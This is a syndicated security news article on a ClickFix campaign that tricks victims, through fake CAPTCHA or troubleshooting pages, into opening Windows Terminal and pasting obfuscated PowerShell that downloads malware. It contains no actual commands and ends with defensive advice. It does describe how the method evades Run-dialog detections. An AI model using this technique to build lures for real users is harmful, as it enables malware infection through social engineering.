By rssfeeds-admin 
The activity, observed by Microsoft Defender experts in February 2026, shows attackers evolving their techniques to bypass common security detections and make malicious instructions appear more legitimate to users.
ClickFix attacks rely heavily on social engineering. Instead of exploiting software vulnerabilities, attackers trick victims into running malicious commands themselves.
In this campaign, the attackers changed their execution method, directing victims to launch Windows Terminal rather than the traditional Windows Run dialog. This subtle change helps the attack blend into normal administrative workflows.
New Execution Technique Using Windows Terminal
Previous ClickFix campaigns commonly instructed victims to press Win + R, paste a command, and execute it through the Run dialog.
Security tools and monitoring systems have increasingly learned to detect this behavior pattern. To evade those defenses, attackers now guide victims to press Windows + X and then I to launch Windows Terminal (wt.exe).
Windows Terminal is a legitimate command-line environment used by developers and administrators to run PowerShell, Command Prompt, and other shell environments.
Because it is widely used for system management tasks, launching it does not immediately appear suspicious. This makes the method more convincing to users and harder for automated security systems to flag as malicious activity.
Once the terminal opens, victims are instructed to paste a PowerShell command supplied by the attacker.
These commands are typically obfuscated and designed to download or execute additional malware from remote servers. The execution occurs directly within the terminal environment, allowing attackers to establish an initial foothold on the system.
Social Engineering Lures Deliver The Payload
The malicious instructions are delivered via deceptive websites and prompts that appear harmless.
Victims may encounter fake CAPTCHA pages, system verification messages, or troubleshooting instructions that claim the user must copy and paste a command to resolve an issue or confirm they are human.
These prompts are carefully crafted to mimic legitimate technical instructions. For example, the page might claim that the command is required to verify the user’s browser, repair a connection issue, or enable access to protected content.
Because the steps resemble routine troubleshooting tasks, victims may follow them without realizing they are executing malicious code.
By using Windows Terminal as the execution environment, attackers gain several advantages.
The technique bypasses security detections that focus on Run dialog abuse, MsftSecIntel reduces suspicion among users familiar with command-line tools, and provides a direct way to run PowerShell payloads with fewer restrictions.
Security experts recommend that organizations educate users about copy-paste attacks and closely monitor suspicious PowerShell activity.
Blocking untrusted scripts, restricting administrative command execution, and improving user awareness can help reduce the risk posed by evolving ClickFix campaigns.
Follow us on Google News , LinkedIn and X to Get More Instant Updates. Set Cyberpress as a Preferred Source in Google.
The post Hackers Exploit Windows Terminal In New ClickFix Malware Attack appeared first on Cyber Security News.
Discover more from RSS Feeds Cloud
Subscribe to get the latest posts sent to your email.